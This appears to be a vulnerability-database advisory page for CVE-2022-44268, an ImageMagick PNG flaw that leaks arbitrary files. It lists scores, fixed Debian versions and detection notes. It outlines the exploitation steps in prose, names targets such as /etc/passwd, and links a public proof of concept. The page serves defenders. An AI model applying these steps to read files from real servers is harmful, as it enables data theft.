cbcvebase.
CVE-2022-44268
published 2023-02-06

CVE-2022-44268: ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the…

PriorityP262medium6.5CVSS 3.1
AVNACLPRNUIRSUCHINAN
EXPLOIT
EPSS
89.85%
99.8th percentile
ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary. file (if the magick binary has permissions to read it).

Affected

6 ranges
VendorProductVersion rangeFixed in
debianimagemagick< imagemagick 8:6.9.11.60+dfsg-1.6 (bookworm)imagemagick 8:6.9.11.60+dfsg-1.6 (bookworm)
imagemagickimagemagick
imagemagickimagemagick>= 0 < 8:6.9.11.60+dfsg-1.3+deb11u18:6.9.11.60+dfsg-1.3+deb11u1
imagemagickimagemagick>= 0 < 8:6.9.11.60+dfsg-1.68:6.9.11.60+dfsg-1.6
imagemagickimagemagick>= 0 < 8:6.9.11.60+dfsg-1.68:6.9.11.60+dfsg-1.6
imagemagickimagemagick>= 0 < 8:6.9.11.60+dfsg-1.68:6.9.11.60+dfsg-1.6

Detection & IOCsextracted from sources · hover to see the quote

versionImageMagick <= 7.1.0-49
filenameexploit.png
commandidentify -verbose result.png
  • Attackers exploit exposed `.git` directories to dump application source code, revealing internal paths, binary locations, and database paths used in subsequent LFI exploitation.
  • The vulnerability requires the attacker to upload a specially crafted PNG to an ImageMagick-powered image processing endpoint, then download the resulting image and decode the hex-encoded 'Raw profile type' metadata field to recover the exfiltrated file contents.
  • Monitor image upload endpoints for PNG files containing tEXt/zTXt/iTXt chunks with a 'profile' keyword referencing filesystem paths (e.g., /etc/passwd, /var/db/*), which is the payload mechanism for CVE-2022-44268.
  • Fixed versions for Debian: bookworm/bullseye/sid/trixie/forky resolved in 8:6.9.11.60+dfsg-1.6 (or 8:6.9.11.60+dfsg-1.3+deb11u1 for bullseye). Presence of ImageMagick older than these versions indicates a vulnerable system.
  • ·Exploitation requires the magick binary to have read permissions on the target file; files unreadable by the ImageMagick process cannot be exfiltrated.
  • ·The PoC at https://github.com/voidz0r/CVE-2022-44268 requires Rust as a pre-requisite to build and run.
  • ·If the server returns an empty 'Raw profile type' field in the output image metadata, the target file either does not exist or is not readable by the ImageMagick process.

CVSS provenance

nvdv3.16.5MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
osv6.5MEDIUM
vendor_debian6.5MEDIUM
vendor_redhat6.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.